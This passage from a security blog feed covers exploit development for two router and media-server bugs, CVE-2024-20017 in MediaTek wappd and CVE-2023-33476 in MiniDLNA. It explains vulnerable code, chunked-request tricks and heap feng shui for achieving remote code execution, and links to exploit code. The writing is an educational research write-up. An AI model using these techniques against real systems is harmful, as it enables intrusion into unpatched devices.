<code class="language-plaintext highlighter-rouge">abort()</code> before we’re able to redirect execution.</p>

<p>With all of that in place, we arrive at the Promised Land:</p>

<p><img src="/assets/images/mtk-wapp-exploit-wax206.png" alt="mtk-wapp-exploit-wax206.png" /></p>

<h2 id="bonus-triggering-a-kernel-bug-by-performing-arbitrary-ioctl-calls-via-jop">bonus: triggering a kernel bug by performing arbitrary IOCTL calls via JOP</h2>

<p>As a final bonus, what if you could write one exploit for two completely separate vulns? Like if
there happened to be a bug in a kernel driver that could only be reached locally and a separate bug
in a network service that could be exploited remotely…? Well, you might have to do some wacky
stuff like use a JOP chain to open a new socket, construct an <code class="language-plaintext highlighter-rouge">iwreq</code> struct in memory to pass to
the kernel, set up arguments, and trigger a call to <code class="language-plaintext highlighter-rouge">ioctl()</code>. But if you can find a way…</p>

<p><img src="/assets/images/mtk-wapp-exploit-rop2kernel.png" alt="mtk-wapp-exploit-rop2kernel.png" /></p>

<p>Why do this rather than just use the command exec to download the kernel exploit and run it? Just to
show you can ;)</p>

<h2 id="wrapping-up">wrapping up</h2>

<p>This post ended up being much longer than I had initially intended it to be! I hope I provided
enough info along the way without making it boring or (too) confusing. I also hope it’s helpful to
anyone looking to learn more about exploit development and that it can provide some insight into the
different approaches that can be taken in different circumstances. Exploiting a stack buffer
overflow is fundamentally the same across all codebases – it’s everything else around the overflow
that makes it interesting and challenging. It’s like working on an intricate puzzle where there’s no
guarantee all of the pieces will fit together but there’s also more than one way to solve it. This
is what makes exploit development fun for me and why I’d go through the trouble of writing 4
different exploits for the same bug. This shit breaks your brain a little lol.</p>

<h2 id="references">references</h2>

<ul>
  <li><a href="https://github.com/mellow-hype/cve-2024-20017" target="_blank">Exploit code</a></li>
  <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-20017" target="_blank">NVD - CVE-2024-20017</a></li>
  <li><a href="https://corp.mediatek.com/product-security-bulletin/March-2024" target="_blank">MediaTek March 2024
  Advisory</a></li>
  <li><a href="https://github.com/denandz/fuzzotron" target="_blank">Fuzzotron</a></li>
  <li><a href="https://downloads.openwrt.org/snapshots/targets/mediatek/mt7622/" target="_blank">OpenWrt MT7622 images
  page</a></li>
</ul>]]></content><author><name>hyper</name></author><category term="0day" /><category term="cve-2024-20017" /><category term="wappd" /><category term="0day" /><category term="mediatek" /><category term="exploit" /><summary type="html"><![CDATA[a post going over 4 exploits for CVE-2024-20017, a remotely exploitable buffer overflow in a component of the MediaTek MT7622 SDK.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/mtk-wapp-exploit-wax206.png" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/mtk-wapp-exploit-wax206.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">chonked pt.2: exploiting cve-2023-33476 for remote code execution</title><link href="https://blog.coffinsec.com/0day/2023/06/19/minidlna-cve-2023-33476-exploits.html" rel="alternate" type="text/html" title="chonked pt.2: exploiting cve-2023-33476 for remote code execution" /><published>2023-06-19T00:00:00+00:00</published><updated>2023-06-19T00:00:00+00:00</updated><id>https://blog.coffinsec.com/0day/2023/06/19/minidlna-cve-2023-33476-exploits</id><content type="html" xml:base="https://blog.coffinsec.com/0day/2023/06/19/minidlna-cve-2023-33476-exploits.html"><![CDATA[<p>This is the second part of the two-part series covering a heap overflow I found in ReadyMedia
MiniDLNA (CVE-2023-33476). This post will focus on the exploit development side of things, going
over the various challenges that had to be overcome and how everything was put together to achieve
remote code execution and pop a reverse shell using a tcache poisoning attack. Check out the first
post for an in-depth root cause analysis and overview of the vulnerability.</p>

<h2 id="introduction">Introduction</h2>
<p>This is the second part of the two-part series covering a heap overflow I found in ReadyMedia
MiniDLNA (CVE-2023-33476). This post will focus on the exploit development side of things, going
over the various challenges that had to be overcome and how everything was put together to achieve
remote code execution and pop a shell. Check out <a href="https://blog.coffinsec.com/0day/2023/05/31/minidlna-heap-overflow-rca.html">part 1</a> for the root cause analysis of this bug.</p>

<p>Before diving into the details of the vulnerability and the exploit, its worth taking a moment to
go over the basics of how chunked requests work and fundamentals of the bug.</p>

<p><strong><em>Disclaimer: this is a pretty long post and there may be a few details I might have missed, but I’ve
tried to include as much as possible to help it all make sense and help others who are trying to
learn. If you find any glaring issues/mistakes please reach out to let me know and I’ll add any
corrections needed.</em></strong></p>

<p>If you just care about the code, you can find it <a href="https://github.com/mellow-hype/cve-2023-33476">here</a>.</p>

<h3 id="review-of-http-chunked-encoding">review of http chunked encoding</h3>

<p>An HTTP request will set the <code class="language-plaintext highlighter-rouge">Transfer-Encoding</code> HTTP header to <code class="language-plaintext highlighter-rouge">chunked</code> to indicate to the
server that the body of the request should be processed in chunks. The chunks follow a common
encoding scheme: a header containing the size of the chunk (in hex) followed by the actual
chunk data. As this is HTTP, the character sequence <code class="language-plaintext highlighter-rouge">\r\n</code> serves as delimiter bytes between chunk
size headers and chunk data. The last chunk (terminator chunk) is always a zero-length chunk.</p>

<p>A typical request using chunked encoding will look something like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /somepath HTTP/1.1
Transfer-Encoding: chunked

4
AAAA
10
BBBBBBBBBBBBBBBB
0

</code></pre></div></div>

<p>The request above contains two chunks: one 4-byte chunk and one 16 byte chunk (chunk sizes are parsed
as hex), followed by the zero-length terminator chunk. The server will parse the chunk sizes and
use this to construct a single blob of data composed of the concatenated chunk data, minus the size
metadata.</p>

<h3 id="summary-of-the-bug-and-initial-primitive">summary of the bug and initial primitive</h3>

<p>Let’s review the fundamentals of the bug and the primitives provided. The relevant snippet of code
that triggers the memory corruption as a result of the bug is shown below.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="kt">char</span> <span class="o">*</span><span class="n">chunkstart</span><span class="p">,</span> <span class="o">*</span><span class="n">chunk</span><span class="p">,</span> <span class="o">*</span><span class="n">endptr</span><span class="p">,</span> <span class="o">*</span><span class="n">endbuf</span><span class="p">;</span>

    <span class="c1">// `chunk`, `endbuf`, and `chunkstart` all begin pointing to the start of the request body</span>
    <span class="n">chunk</span> <span class="o">=</span> <span class="n">endbuf</span> <span class="o">=</span> <span class="n">chunkstart</span> <span class="o">=</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">+</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentoff</span><span class="p">;</span>

    <span class="k">while</span> <span class="p">((</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span> <span class="o">=</span> <span class="n">strtol</span><span class="p">(</span><span class="n">chunk</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">endptr</span><span class="p">,</span> <span class="mi">16</span><span class="p">))</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="n">endptr</span> <span class="o">!=</span> <span class="n">chunk</span><span class="p">)</span> <span class="p">)</span>
    <span class="p">{</span>
        <span class="n">endptr</span> <span class="o">=</span> <span class="n">strstr</span><span class="p">(</span><span class="n">endptr</span><span class="p">,</span> <span class="s">"</span><span class="se">\r\n</span><span class="s">"</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">endptr</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">Send400</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
            <span class="k">return</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="n">endptr</span> <span class="o">+=</span> <span class="mi">2</span><span class="p">;</span>

        <span class="c1">// this call to memmove will use the chunk size parsed by strol() above</span>
        <span class="n">memmove</span><span class="p">(</span><span class="n">endbuf</span><span class="p">,</span> <span class="n">endptr</span><span class="p">,</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span><span class="p">);</span>

        <span class="n">endbuf</span> <span class="o">+=</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span><span class="p">;</span>
        <span class="n">chunk</span> <span class="o">=</span> <span class="n">endptr</span> <span class="o">+</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span><span class="p">;</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>To recap the important details:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">strtol()</code> is used to parse the HTTP chunk size from the body of the request (which we fully
control). The value returned by <code class="language-plaintext highlighter-rouge">strtol()</code> is saved to <code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code></li>
  <li><code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code> is used as the size argument in a call to <code class="language-plaintext highlighter-rouge">memmove()</code> without bounds-checking</li>
  <li>The <code class="language-plaintext highlighter-rouge">dest</code> and <code class="language-plaintext highlighter-rouge">src</code> arguments passed to <code class="language-plaintext highlighter-rouge">memmove()</code> are both offsets into the request buffer;
in theory, they should point to the first digit of the chunk size and the first byte of the actual
chunk data that follows the chunk size, respectively.</li>
  <li>the request buffer containing our data is allocated on the heap</li>
</ul>

<p>Due to the missing bounds-check in the code above (and the broken validation logic that is the
root cause of the issue), the bug provides an OOB read/write primitive of arbitrary size. At this
point, I still had almost no control over what gets written and where its written to. Since the
corruption occurs on data allocated on the heap, this introduced the option to either attack the
application data directly or target the heap metadata to derive more powerful primitives.</p>

<h2 id="understanding-the-corruption-mechanism">Understanding the Corruption Mechanism</h2>

<p><em>NOTE: all references to “chunks” in the sections below are referring to HTTP chunks, not heap chunks.</em></p>

<h3 id="effects-of-memmove">effects of <code class="language-plaintext highlighter-rouge">memmove()</code></h3>

<p>We’ll start with the detail that had the most impact on developing the exploit: the use of
<code class="language-plaintext highlighter-rouge">memmove()</code> to concatenate the end of one HTTP chunk to the next. Each iteration through the while
loop in the code snippet above is meant to process a single HTTP chunk from the body of the request;
assuming multiple chunks are present (which is always the case for valid requests) the code needs to
concatenate the beginning of the chunk it is processing to the tail end of the chunks that have
already been processed and remove the chunk size metadata between them. The application does this
in-line within the same buffer instead of creating a new allocation to hold the final blob of data;
it selects the range of bytes pertaining to the current chunk being processed based on the chunk size
it finds in the request and will then ‘left-shift’ those bytes <code class="language-plaintext highlighter-rouge">x</code> bytes lower in memory, where <code class="language-plaintext highlighter-rouge">x</code>
is the total length of the chunk size field (i.e. <code class="language-plaintext highlighter-rouge">strlen(chunk_size_line)</code>).</p>

<p>In practical terms, this introduces the following conditions and constraints:</p>

<ul>
  <li>As we can only control the size and not the location of the r/w, we are only be able to r/w
higher into memory relative to location of the chunk in the buffer allocated for the request</li>
  <li>The number of bytes the data will be left-shifted by is determined by the distance between the
<code class="language-plaintext highlighter-rouge">dest</code> and <code class="language-plaintext highlighter-rouge">src</code> args passed to <code class="language-plaintext highlighter-rouge">memmove()</code> (<code class="language-plaintext highlighter-rouge">endbuf</code> and <code class="language-plaintext highlighter-rouge">endptr</code> respectively in the snippet of
the vulnerable code above)</li>
</ul>

<h3 id="visualizing-the-operation">visualizing the operation</h3>

<p>This particular aspect of the bug and the impact it has on exploitation isn’t very intuitive (at
least not to me) so it may be useful to try to visualize it. I created the graphic below using Google
Sheets (lol) while working on the exploit to help me grok the details so I’m hoping it’s useful here.</p>

<p>The before and after rows below represent a contiguous chunk of memory containing the contents of an
HTTP request before and after the <code class="language-plaintext highlighter-rouge">memmove()</code> operation using the chunk size at the beginning of
the request data (23). We can imagine that the row of bytes is a ribbon on a fixed track; by “pulling”
on the left side of the ribbon starting at <code class="language-plaintext highlighter-rouge">read_src</code> , we can shift the bytes to the left toward
us (we’re fixed at <code class="language-plaintext highlighter-rouge">write_dest</code>). There isn’t a limit to how much data to the right of <code class="language-plaintext highlighter-rouge">read_src</code>
we can shift left, but we can only shift by (<code class="language-plaintext highlighter-rouge">read_src - write_dest</code>) slots. The grid slots (i.e.
addresses) are fixed, so if we want some payload to end up at a specific target address we need to
be able to shift the bytes of that payload left by at least (<code class="language-plaintext highlighter-rouge">target_addr - payload_addr</code>).</p>

<p>To break it down:</p>

<ul>
  <li>The cells with the red border show the bytes that would be selected by a chunk size of 23 (as
seen at the beginning of the row)</li>
  <li>The location where <code class="language-plaintext highlighter-rouge">memmove()</code> will write the bytes to is highlighted in green (<code class="language-plaintext highlighter-rouge">endbuf</code> ptr
passed as first arg)</li>
  <li>The location where <code class="language-plaintext highlighter-rouge">memmove()</code> will start reading from is highlighted in purple (<code class="language-plaintext highlighter-rouge">endptr</code> ptr
passed as the second arg)</li>
</ul>

<p><img src="/assets/images/chonked-images/memmove-viz-1.png" alt="memmove-viz-1.png" /></p>

<p>Extrapolating from the examples above, we can see that changing the chunk size alone will have
virtually 0 impact on <em>where</em> the data is written relative to our target — larger sizes will reach
further into memory but will result in those bytes being shifted by the same distance, which means
for a given target at address <code class="language-plaintext highlighter-rouge">x</code> and payload data at <code class="language-plaintext highlighter-rouge">x+20</code>, selecting bytes up to x+20 or x+100
will result in the same bytes being written to <code class="language-plaintext highlighter-rouge">x</code> after the call to <code class="language-plaintext highlighter-rouge">memmove()</code>.</p>

<h3 id="controlling-the-shift-distance">controlling the shift distance</h3>

<p>As mentioned in the previous section, the distance the selected byte-range is shifted by is
determined by the number of bytes between the pointer where the bytes will be written (<code class="language-plaintext highlighter-rouge">endbuf</code>)
and the pointer where data will be read from (<code class="language-plaintext highlighter-rouge">endptr</code>). Based on the parsing logic, this ends up
being the number of bytes between the first byte of the chunk size in the request body and the
location where the first byte of actual chunk data is expected to be. In the code, this is done by
passing a pointer <code class="language-plaintext highlighter-rouge">&amp;endptr</code> as the second arg to <code class="language-plaintext highlighter-rouge">strtol()</code> when parsing the chunk size value from
the request to have <code class="language-plaintext highlighter-rouge">strtol()</code> store the location of the first non-parsable value it encounters to this pointer.
In a normal request, this would be the <code class="language-plaintext highlighter-rouge">\r</code> that comes immediately after the chunk size. The code
checks for the presence of <code class="language-plaintext highlighter-rouge">\r\n</code> starting at the value saved to this pointer to confirm this sequence
is in fact present and if found increments it by 2 to move it past those characters. The pointer
would then presumably point to the start of the actual chunk data.</p>

<p>The relevant code is shown again here:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="k">while</span> <span class="p">((</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span> <span class="o">=</span> <span class="n">strtol</span><span class="p">(</span><span class="n">chunk</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">endptr</span><span class="p">,</span> <span class="mi">16</span><span class="p">))</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="n">endptr</span> <span class="o">!=</span> <span class="n">chunk</span><span class="p">)</span> <span class="p">)</span>
  <span class="p">{</span>
        <span class="n">endptr</span> <span class="o">=</span> <span class="n">strstr</span><span class="p">(</span><span class="n">endptr</span><span class="p">,</span> <span class="s">"</span><span class="se">\r\n</span><span class="s">"</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">endptr</span><span class="p">)</span>
        <span class="p">{</span> <span class="p">...</span> <span class="p">}</span>
        <span class="n">endptr</span> <span class="o">+=</span> <span class="mi">2</span><span class="p">;</span>

        <span class="n">memmove</span><span class="p">(</span><span class="n">endbuf</span><span class="p">,</span> <span class="n">endptr</span><span class="p">,</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_chunklen</span><span class="p">);</span>
<span class="p">...</span>
</code></pre></div></div>

<p>This means that in order to gain control over that distance, its necessary to introduce additional
bytes between the two pointers without causing <code class="language-plaintext highlighter-rouge">strtol()</code> to stop parsing prematurely. Taking a
look at the manpage for <code class="language-plaintext highlighter-rouge">strtol()</code>, the following line caught my attention:</p>

<blockquote>
  <p>The string may begin with an arbitrary amount of white space (as determined by isspace(3)). […] The remainder of the string is converted to a long value in the obvious manner, […]</p>
</blockquote>

<p>By prepending the chunk size value with whitespace, it’s possible to introduce a nearly arbitrary
number of bytes in order to affect the distance between <code class="language-plaintext highlighter-rouge">endbuf</code> and <code class="language-plaintext highlighter-rouge">endptr</code> when <code class="language-plaintext highlighter-rouge">memmove()</code> is
called. Alternatively, prepending <code class="language-plaintext highlighter-rouge">0's</code> to the chunk size achieves the same result.</p>

<h4 id="example">example</h4>

<p>This example shows a request where no leading whitespace has been added. At the first round of processing:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">endbuf</code> is at index/address <strong>489</strong></li>
  <li><code class="language-plaintext highlighter-rouge">endptr</code> is at index/address <strong>493</strong></li>
  <li>Chunk size is 23, so 23 bytes will be shifted</li>
  <li>(<code class="language-plaintext highlighter-rouge">489 - 493 = -4</code>), so each byte in the range of bytes to be shifted will shift <strong>-4 bytes</strong> down.</li>
  <li>We want to overwrite 4 bytes starting at index <strong>501</strong> (cells highlighted in red)</li>
  <li>The payload data we want to use for the overwrite starts at index <strong>512</strong> (cells highlighted in yellow)</li>
  <li>Distance between overwrite target and overwrite data source is <strong>-11 bytes</strong></li>
  <li>The corruption does <strong>NOT</strong> successfully shift our overwrite data to the desired location</li>
</ul>

<p><img src="/assets/images/chonked-images/shift-viz-1.png" alt="shift-viz-1.png" /></p>

<p>With the introduction of whitespaces prepended to the chunk size at the start of the request body:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">endbuf</code> is now at index <strong>482</strong></li>
  <li><code class="language-plaintext highlighter-rouge">endptr</code> is still at index <strong>493</strong></li>
  <li>(<code class="language-plaintext highlighter-rouge">482 - 493 = -11</code>), so each byte in the range of bytes to be shifted will shift <strong>-11 bytes</strong> down.</li>
  <li>We want to overwrite 4 bytes starting at index <strong>501</strong></li>
  <li>The data we want to use for the overwrite starts at index <strong>512</strong></li>
  <li>Distance between overwrite target and overwrite data source is still <strong>-11 bytes</strong></li>
</ul>

<p><img src="/assets/images/chonked-images/shift-viz-2.png" alt="shift-viz-2.png" /></p>

<p>Based on this, I concluded that it would be necessary to insert enough whitespace before the chunk
size to make <code class="language-plaintext highlighter-rouge">endbuf - endptr</code> == <code class="language-plaintext highlighter-rouge">overwrite_target - payload_data</code></p>

<h3 id="heap-based-corruption">heap-based corruption</h3>

<p>The corruption occurs on heap-allocated data, so it’s possible to corrupt the metadata of
neighboring heap chunks. Based on the conditions described so far, it’s actually <em>impossible</em> to
avoid corrupting at least the chunk that is immediately next to ours. This is because for a minimal
request containing no data in the chunk fields (such as the request provided as an example at the
beginning of this post) the <code class="language-plaintext highlighter-rouge">memmove()</code> operation is going to be performed on data near the end of
the allocated buffer, overflowing into the next chunk almost immediately. While this introduces
additional attack surface and exploitation options, it also adds some limitations, namely the need
to bypass Glibc security and sanity checks so as to avoid <code class="language-plaintext highlighter-rouge">abort()</code>ing before the exploit finishes
or triggering some other crash.</p>

<h2 id="heap-feng-shui">Heap Feng Shui</h2>

<p><em>NOTE: references to “chunks” below are referring to heap chunks now, not HTTP chunks.</em></p>

<p>Given the heap-allocated buffers, we’ll focus on exploiting the heap directly (i.e. targeting
heap chunk metadata). Heap-based exploits typically benefit from (or outright require) achieving
some level of control over the layout of the heap in order to get target objects and payload data
allocated at predictable locations. Based on conditions described above, this would be absolutely
necessary for a successful exploit in this case. Specifically, it would be necessary in order to
meet these requirements:</p>

<ol>
  <li>The target address for the overwrite target must be located higher in memory <em>relative to where
the request buffer used to trigger the corruption is located</em></li>
  <li>The payload data used to overwrite the target address must be located higher in memory
<em>relative to the target address</em></li>
</ol>

<p>Based on these requirements, the ideal memory layout would look something like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x2000
---
	.....................
	...request_buffer.... &lt;-- the buffer that will be used to trigger the corruption
	.....................
	.....................
	...overwrite_target.. &lt;-- the object/addr we want to overwrite with controlled data
	.....................
	.....................
	....payload_data..... &lt;-- the controlled data we want to write at the overwrite_target
	.....................
---
0x2600
</code></pre></div></div>

<p>For this theoretical layout, we would then provide a chunk size large enough to traverse the
<code class="language-plaintext highlighter-rouge">overwrite_target</code> and reach the last byte of the <code class="language-plaintext highlighter-rouge">payload_data</code>.</p>

<p>In practice, to achieve the layout above its necessary to:</p>

<ul>
  <li>Have controlled data allocated to the heap</li>
  <li>Prevent the allocations from being <code class="language-plaintext highlighter-rouge">free()</code>’ed prematurely</li>
  <li>Force allocations to happen sequentially or in a way that can be reliably predicted</li>
</ul>

<h3 id="controlling-allocations">controlling allocations</h3>

<p>Unsurprisingly, the most straightforward way to force the application to make heap allocations with
controlled data is by sending HTTP requests, so this can be used as an interface/proxy for <code class="language-plaintext highlighter-rouge">malloc()</code>.
One important detail about this is that the request buffer allocations are done using <code class="language-plaintext highlighter-rouge">realloc()</code>
rather than <code class="language-plaintext highlighter-rouge">malloc()</code>  — requests that exceed 2048 bytes will result in the existing allocation
being reallocated, which can affect the heap layout and result in heap chunks being freed
unintentionally. We can avoid this issue entirely by keeping all requests below this size.</p>

<h3 id="holding-request-allocations">holding request allocations</h3>

<p>The next requirement is almost more important than the first — the allocations containing our
controlled data must remain allocated across multiple requests in order to successfully get the
desired memory layout. This took a little bit of fiddling around but I eventually found an easy way
to do this.</p>

<p>The code that handles the initial reading of the request data from the socket is shown below. After
copying the data from the static buffer to the dynamically allocated buffer at <code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code>, it
searches for the presence of the sequence <code class="language-plaintext highlighter-rouge">\r\n\r\n</code> using <code class="language-plaintext highlighter-rouge">strstr()</code> to determine whether the
entire contents of the HTTP headers have been received (the first occurrence of that sequence is
expected to be the terminator for the headers).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>        <span class="n">memcpy</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">+</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">n</span><span class="p">);</span>
        <span class="c1">// update req_buflen</span>
        <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span> <span class="o">+=</span> <span class="n">n</span><span class="p">;</span>
        <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">[</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>

        <span class="cm">/* search for the string "\r\n\r\n" */</span>
        <span class="c1">// this is the mechanism used to determine where the end of the http</span>
        <span class="c1">// headers are since that should be the first occurance of this string sequence</span>
        <span class="c1">// for a normal http request.</span>
        <span class="n">endheaders</span> <span class="o">=</span> <span class="n">strstr</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">,</span> <span class="s">"</span><span class="se">\r\n\r\n</span><span class="s">"</span><span class="p">);</span>

        <span class="k">if</span><span class="p">(</span><span class="n">endheaders</span><span class="p">)</span>
        <span class="p">{</span>
          <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentoff</span> <span class="o">=</span> <span class="n">endheaders</span> <span class="o">-</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">+</span> <span class="mi">4</span><span class="p">;</span>
          <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentlen</span> <span class="o">=</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span> <span class="o">-</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentoff</span><span class="p">;</span>
          <span class="n">ProcessHttpQuery_upnphttp</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
        <span class="p">}</span>
</code></pre></div></div>

<p>If this sequence is <strong>not</strong> found, the application will move on without entering the block where
<code class="language-plaintext highlighter-rouge">ProcessHttpQuery_upnphttp()</code> is called above and wait for the client to send more data to complete
the headers. This leaves the buffer at <code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code>  containing up to the first 2048 bytes of data
sent allocated indefinitely until more data arrives on the socket or the connection is dropped by
the client. By introducing a NULL byte anywhere before the first <code class="language-plaintext highlighter-rouge">\r\n\r\n</code> terminator in the
request data sent it’s possible to force <code class="language-plaintext highlighter-rouge">strstr()</code> to terminate early and not find those characters.
Alternatively, not including the terminator sequence at all will also result in the application
assuming the client has not yet sent all headers and holding the the allocation. We can then
<code class="language-plaintext highlighter-rouge">free()</code> any allocation made this way by closing the socket used to initiate it.</p>

<h3 id="getting-sequential-allocations">getting sequential allocations</h3>

<p>With the two previous steps figured out, it was then possible to start influencing the heap layout
with sufficient control to start working on getting the allocations made in a predictable way in
order to eventually set things up in an ideal way for the exploit. The first step was to identify
where heap allocations happen along the execution path for request processing, their sizes, and
whether they contained any data that may be interesting to target. After a bit of code review we can
determined that, apart from the request buffer allocation (saved to <code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code>), the only other
relevant allocation that happens for each request is for a <code class="language-plaintext highlighter-rouge">upnphttp</code> structure, which stores the
state, data, and metadata for the request being processed (saved to <code class="language-plaintext highlighter-rouge">h</code>). The pointer to the
request buffer itself is stored inside the <code class="language-plaintext highlighter-rouge">upnphttp</code> structure.</p>

<p>I created the following GDB script to log every time either a request allocation or <code class="language-plaintext highlighter-rouge">upnphttp</code>
struct allocation occurred and the addresses for the allocations.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>set verbose off
gef config context.enable False

break upnphttp.c:1140
commands 1
    echo \n\n
    printf "============== Allocation for req_buf is at %p\n",h-&gt;req_buf
    echo \n\n
    printf "==============================================\n"
    continue
end

break upnphttp.c:118
commands 2
    echo \n\n
    printf "============== NEW upnphttp struct is at = %p\n",ret
    echo \n\n
    printf "==============================================\n"
    continue
end

run -R -f testing_tmp.conf -d
</code></pre></div></div>

<p>I wrote a Python script using raw sockets to start performing allocations for both the
<code class="language-plaintext highlighter-rouge">upnphttp</code> structures and the request buffers and observing the addresses where the allocations
occurred, using the method described in the previous section to keep the allocations held in memory
across multiple requests. This took a bit of fiddling and playing with the order that connections
were initiated in and when request buffers were allocated but I eventually found that after about
6-7 request buffer allocations (after having initiated the connections ahead of time) the buffers
began getting allocated sequentially in memory.</p>

<h3 id="separating-the-connection-and-request-buffer-allocations">separating the connection and request buffer allocations</h3>

<p>Because the fields of the <code class="language-plaintext highlighter-rouge">upnphttp</code> structure are accessed throughout the code that handles
request processing, it would be ideal to separate those allocations from the request buffer
allocations so that the latter end up allocated sequentially, rather than having the <code class="language-plaintext highlighter-rouge">upnphttp</code>
structures sandwiched between them. This can be accomplished by initiating the connections that
will be needed <em>before</em> sending any data on the sockets — the <code class="language-plaintext highlighter-rouge">upnphttp</code> structures are allocated
when the connection is received (in <code class="language-plaintext highlighter-rouge">New_upnphttp()</code>, called by <code class="language-plaintext highlighter-rouge">ProcessListen()</code> upon receiving
a new connection) and will remain allocated as long as the connection is kept open, which allows
us to send data asynchronously from when the connections are initiated.</p>

<h3 id="the-ol-switcheroo---getting-the-corruption-request-inserted-at-the-top-of-the-crafted-heap">the ol’ switcheroo - getting the corruption request inserted at the ‘top’ of the crafted heap</h3>

<p>Taking another look at the ideal heap layout described above, here is what needs to be done
to construct it using the techniques and information described so far:</p>

<ul>
  <li>Allocate the connection <code class="language-plaintext highlighter-rouge">upnphttp</code> structs that will be needed before sending any request data</li>
  <li>Send request data on <code class="language-plaintext highlighter-rouge">x</code> of the allocated connections to reach the point where request buffer
allocations start happening sequentially. The real ‘crafted heap’ starts here.</li>
  <li>Send the request data for the request that will trigger the corruption (’top’ of the crafted
heap, at lower address)</li>
  <li>Send request data to create another request buffer allocation of the same size as the previous
one (the ‘middle’). Assume the overwrite target is the heap chunk metadata of this allocation.</li>
  <li>Send the request containing the payload data that will be written to the target (’bottom’ of the
crafter heap, at higher address)</li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x2000
---
	.....................
	...corrupt_buffer.... &lt;-- the buffer that will be used to trigger the corruption
	.....................
	.....................
	...overwrite_target.. &lt;-- the object/addr we want to overwrite with controlled data
	.....................
	.....................
	....payload_data..... &lt;-- the controlled data we want to write at the overwrite_target
	.....................
---
0x2600
</code></pre></div></div>

<p>As can be seen, the request that is used to trigger the corruption must be sent <em>before</em> allocating
the other buffers to have it allocated at a lower address relative to the others. This is a bit of
an issue because sending the actual corruption payload first would either trigger a crash prematurely
at worst (preventing anything else from being done) or get processed and result in the buffer
being <code class="language-plaintext highlighter-rouge">free()</code>‘d at best. After spending some time learning about the Glibc <code class="language-plaintext highlighter-rouge">malloc</code> implementation
and heap exploitation in general, I chose to address this issue by using a ‘placeholder’ allocation
in the place where the corruption buffer would need to be; that allocation then gets <code class="language-plaintext highlighter-rouge">free()</code>‘d
immediately before sending the actual corruption request, after the crafted heap has been set up.
By making this placeholder allocation the same size as the corruption request allocation (rounded
up to the actual <code class="language-plaintext highlighter-rouge">malloc</code> chunk size), making an allocation of that size immediately after it’s
<code class="language-plaintext highlighter-rouge">free()</code>‘d  results in the same chunk being returned by <code class="language-plaintext highlighter-rouge">malloc()</code> due to its “first fit” design.
This means that sending the actual corruption request after dropping the connection for the
placeholder buffer (causing it to be <code class="language-plaintext highlighter-rouge">free()</code>‘d) will result in the data for the corruption payload
being allocated where we need it.</p>

<h3 id="putting-it-all-together">putting it all together</h3>

<p>Having figured out everything covered in the previous sections, we now have everything we need to
write an exploit. Before going into the meaty details, lets take a moment to review. We can now:</p>

<ul>
  <li>Control when allocations (i.e. <code class="language-plaintext highlighter-rouge">malloc</code> calls) are made and control their size</li>
  <li>Control when allocations are <code class="language-plaintext highlighter-rouge">free()</code>‘d so we can keep buffers in place while we make other allocations</li>
  <li>Have sufficient influence over the allocator to get it to start giving us allocations that are sequential in memory</li>
  <li>Have the request buffer that will trigger the corruption allocated in an ideal location for exploitation</li>
</ul>

